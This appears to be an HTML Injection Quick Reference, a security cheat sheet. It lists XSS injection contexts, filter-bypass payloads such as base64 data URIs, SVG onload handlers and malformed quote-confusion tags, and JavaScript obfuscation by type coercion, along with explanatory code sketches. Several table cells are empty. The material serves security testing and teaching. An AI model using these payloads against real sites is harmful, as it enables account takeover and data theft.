HTML Injection

Some articles on HTML Injection and XSS:
– When a payload travels from a URL parameter to a cookie and back again, say farewell to your security.
– An attack is persistent when the payload continues to be reflected after only being injected once; kind of like how user-tracking uses cookies to keep a persistent profile on you.
– Browsers may be more tolerant of an injection payload than your security filters.
– A vulnerable web app may already have all the libraries you need to summon exploit code from somewhere else.
– Preserve a script block’s syntax when injecting into JavaScript. Use a payload that maintains correct syntax; don’t let an error in the browser’s parser prevent your hack from working. And take a logical approach to crafting the attack.
– A walk-through of a simple injection attack. And an equally simple attack that injects a payload across two URL parameters.
– An example of how Content Security Policy counters HTML injection attacks so that JavaScript is Harmless.
– How a tricky payload bypassed a countermeasure that inadequately escaped JavaScript metacharacters.
– Comparing a coding weakness vs. an exploitable vuln.
– Read the introduction to the HIQR.
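
The advice about preserving a script block's syntax can be checked mechanically. What follows is a minimal sketch, assuming a hypothetical page template that writes unescaped input into a double-quoted string assignment. The names renderScript and parses are illustrative and do not come from any library. The Function constructor is used only to compile the resulting source (the function is never called), so a payload that breaks the syntax surfaces as a SyntaxError.

```javascript
// Hypothetical template: the app writes raw input inside a double-quoted string.
function renderScript(input) {
  return 'var foo="' + input + '";';
}

// Compile the source without running it and report whether it is valid syntax.
function parses(source) {
  try {
    new Function(source); // compiles only; the function is never invoked
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Closes the string, adds a statement, comments out the trailing quote.
const balanced = renderScript('";alert(9);//');
// Closes the string but leaves the template's trailing quote dangling.
const broken = renderScript('";alert(9)');

console.log(balanced, parses(balanced));
console.log(broken, parses(broken));
```

The second payload fails to parse because the template's own closing quote starts a string that never ends, which is exactly the kind of parser error that stops an injection from running.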

HTML Injection Quick Reference (HIQR)

Table 1: Injection Techniques for Various Parsing Contexts

Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation

Table 3: JavaScript Compositions for Manipulation & Obfuscation

Injection Techniques for Various Parsing Contexts1
Context State Injection Example
Data State
(Text node, open tag)

Welcome back,


<title>Search Results for ‘</title>☣





Attribute value


<input type=text name=foo value=a>☣>






JavaScript variable assignment



var foo="";☣;//";


var foo='';☣;//';

JavaScript Window.location object property


document.write("Page not found: " + window.location);




$(document).ready(function() {
  var x = (window.location.hash.match(/^#([^\/].+)$/) || [])[1];
  var w = $('a[name="' + x + '"], [id="' + x + '"]');


1 The biohazard symbol (U+2623), ☣, in each example represents a JavaScript payload. It could be anything from a while loop that causes a denial of service in the browser, e.g. var a;while(1){a+="a"}, to the ubiquitous alert(9). These categories focus on the placement of the payload within the rendered document rather than the effect of the payload.

Though it seems daunting to review the HTML5 syntax specification, doing so aids in understanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for parsing HTML documents. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Agent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus removing a historical source of insecurity. The HTML4 spec was not as clear or as rigorous on parsing.

2 Sometimes it’s helpful to insert a space before the --> to ensure the tag is interpreted. [ HTML5 comments ]

3 This is a quirk of jQuery’s design choice for overloading the $() API to accept selectors or elements. Read about the interplay of JavaScript and Content Security Policy on the blog.
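
The window.location.hash example from the table can be traced without a browser. This is a minimal sketch that reuses the table's regular expression and string concatenation; the function names, the hostile fragment, and the allow-list check are assumptions for illustration, not the article's fix. Whether the resulting string is then treated as markup rather than as a selector depends on the jQuery version in use.

```javascript
// Same pattern as the table's example: capture everything after "#"
// unless the fragment starts with "/".
function fragmentFromHash(hash) {
  return (hash.match(/^#([^\/].+)$/) || [])[1];
}

// Vulnerable composition: the fragment is concatenated into the selector string.
function buildSelector(fragment) {
  return 'a[name="' + fragment + '"], [id="' + fragment + '"]';
}

// Hypothetical hardening (an assumption): accept only characters
// that are plausible in an anchor name, otherwise return null.
function safeFragment(hash) {
  const fragment = fragmentFromHash(hash);
  if (fragment === undefined) return null;
  return /^[A-Za-z0-9_-]+$/.test(fragment) ? fragment : null;
}

const hostileHash = '#<img src=x onerror=alert(9)>';
const selector = buildSelector(fragmentFromHash(hostileHash));

console.log(selector);                   // markup now sits inside the "selector"
console.log(safeFragment(hostileHash));  // rejected by the allow-list
console.log(safeFragment('#section-2')); // ordinary anchor names pass
```

The point is placement: the payload arrives through the fragment identifier, which never reaches the server, so server-side filters never see it.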

Payload Crafting Techniques to Bypass Filters and Data Validation


Payload Example
Alternate attribute delimiters

Forward slash

Dangling quoted string



CRLF instead of space

JavaScript inline event handlers1
[ html4 | html5 ]







HTML5 autofocus


Data URI handlers2

src & href attributes


Base64 data

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg">foo</a>

Alternate character sets

<a href="data:text/html;charset=utf-16,

Alternate markup


<svg onload="javascript:alert(9)" xmlns=""></svg>

<svg xmlns="">
<g onload="javascript:alert(9)"></g></svg>


<svg xmlns="">
<a xmlns:xlink="" xlink:href="javascript:alert(9)">
<rect width="1000" height="1000" fill="white"/></a></svg>

Untidy markup

Missing greater-than sign


Recover from syntax error

<a href=""&<img&amp;/onclick=alert(9)>foo</a>

Uncommon syntax

<a””id=a href=”onclick=alert(9)>foo</a>

Orphan entity

<a href=""&amp;/onclick=alert(9)>foo</a>

Vestigial attribute


Anti-regex patterns

Element closed prematurely

<img src=">"onerror=alert(9)>

Element confusion

<img id="><"class="><"src=">"onerror=alert(9)>

Quote confusion

<img src="\"a=">"onerror=alert(9)>

<a id=' href="">'href=javascript:alert(9)>foo</a>

<a id='href='onclick=alert(9)>foo</a>

<a href= . '"\' onclick=alert(9) '"'>foo</a>

Quote confusion with element

<img src="\"'<a href='">"'onerror=alert(9)>

<a id=''onclick=alert(9)<!--href=a>foo</a>-->

Quote mixing with element

<img src="'"id='<img src="">'onerror=alert(9)>

Recursive elements

<img src="<img src='<img src=.>'>"onerror=alert(9)>

Repeated attributes (match last occurrence)3

<a href=javascript:alert(9) href href=” href=””>foo</a>
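
The repeated-attributes technique works when a filter and the browser disagree on which duplicate counts. Here is a minimal sketch of that disagreement, assuming the attributes have already been tokenized into name/value pairs. The attribute list is modelled on the table's repeated-href example, and both function names are hypothetical. The first function follows the HTML5 rule that later duplicates are dropped; the second models a naive filter that lets later duplicates overwrite earlier ones.

```javascript
// Attribute list modelled on the repeated-href example:
// one javascript: href followed by empty duplicates, in source order.
const sourceAttributes = [
  ['href', 'javascript:alert(9)'],
  ['href', ''],
  ['href', ''],
  ['href', ''],
];

// HTML5 tokenizer behaviour: the first attribute with a given name is kept,
// later ones with the same name are dropped.
function firstWins(attrs) {
  const seen = new Map();
  for (const [name, value] of attrs) {
    const key = name.toLowerCase();
    if (!seen.has(key)) seen.set(key, value);
  }
  return seen;
}

// Hypothetical naive filter: each duplicate overwrites the previous value.
function lastWins(attrs) {
  const seen = new Map();
  for (const [name, value] of attrs) {
    seen.set(name.toLowerCase(), value);
  }
  return seen;
}

console.log('browser sees:', JSON.stringify(firstWins(sourceAttributes).get('href')));
console.log('filter sees: ', JSON.stringify(lastWins(sourceAttributes).get('href')));
```

A filter that inspects only the last href sees an empty, harmless value, while the browser keeps the first one.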


1 HTML5’s Content Security Policy headers can neutralize these attacks by preventing the User Agent from executing JavaScript within this context unless the page author is forced to include the “unsafe-inline” directive.

2 The basic format is dataurl := “data:” [ mediatype ] [ “;base64” ] “,” data. The scheme is defined in RFC 2397.

3 Per HTML5 spec, “When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”
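
The data URI format from note 2 is easy to take apart by hand. The following is a minimal sketch, assuming Node.js (it relies on Node's Buffer for base64); toDataUri and decodeBase64DataUri are illustrative names, not part of any library. It decodes the Base64 payload from the table and rebuilds an equivalent URI from plain text.

```javascript
// Build a URI of the form: "data:" [ mediatype ] [ ";base64" ] "," data
function toDataUri(mediaType, text) {
  const encoded = Buffer.from(text, 'utf8').toString('base64');
  return 'data:' + mediaType + ';base64,' + encoded;
}

// Split a base64 data: URI at the first comma and decode the data part.
function decodeBase64DataUri(uri) {
  const comma = uri.indexOf(',');
  if (comma < 0) throw new Error('missing "," separator');
  const header = uri.slice(0, comma); // e.g. "data:text/html;base64"
  const data = uri.slice(comma + 1);
  if (!header.startsWith('data:') || !header.endsWith(';base64')) {
    throw new Error('not a base64 data: URI');
  }
  // Node's decoder accepts input with the trailing "=" padding omitted.
  return Buffer.from(data, 'base64').toString('utf8');
}

const fromTable = 'data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg';
const decoded = decodeBase64DataUri(fromTable);
const rebuilt = toDataUri('text/html', decoded);

console.log(decoded);
console.log(rebuilt);
```

The rebuilt URI differs from the table's only by the "==" padding that the encoder appends. A filter that looks for a literal script tag in an href will not find it in either form.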
JavaScript Compositions for Manipulation & Obfuscation



String operators

var a = "foo"+alert(9)//";

Logical operators

var a = "foo"&&alert(9)//";

Mathematical operators

var a = "foo"/alert(9)//";

Function execution



Method lookup



String object


Regex object source attribute

alert(/foo bar/.source)


Harness functions from a JavaScript library


angular.bind(self, alert, 9)()


Ember JS, alert, 9)


_.defer(alert, 9)

_.delay(alert, 0, 9)


Type coercion

1) Boolean + Object to String

false + "" = "false"

![] + []

2) String by index to character

( false + "" )[1] = "a"

( ![] + [] )[1]

3) Compose string


(![]+[])[1] +
(![]+[])[2] +
(![]+[])[4] +
(!![]+[])[1] +
(!![]+[])[0]

4) Function by method lookup


(window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
(!![]+[])[1] + (!![]+[])[0]])(9)
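
The four type-coercion steps can be run end to end outside a browser. This is a minimal sketch in which fakeWindow is a stand-in for the browser's window object, an assumption made so the code runs under Node.js. Everything else uses only the coercions listed above.

```javascript
// Step 1: Boolean + Object to String.
const falseText = ![] + [];  // "false"
const trueText = !![] + [];  // "true"

// Steps 2 and 3: index into the strings and compose a name.
const name =
  falseText[1] + // "a"
  falseText[2] + // "l"
  falseText[4] + // "e"
  trueText[1] +  // "r"
  trueText[0];   // "t"

// Step 4: function by method lookup.
// fakeWindow is a stand-in for window (an assumption for running outside a browser).
const fakeWindow = {
  alert: (value) => 'alert(' + value + ')',
};
const result = fakeWindow[name](9);

console.log(name);
console.log(result);
```

No letters or quote characters appear in the expressions that build the name, which is why filters that match on the word alert or on string delimiters miss this form.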


Creative Commons License
This HTML Injection Quick Reference (HIQR) is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.
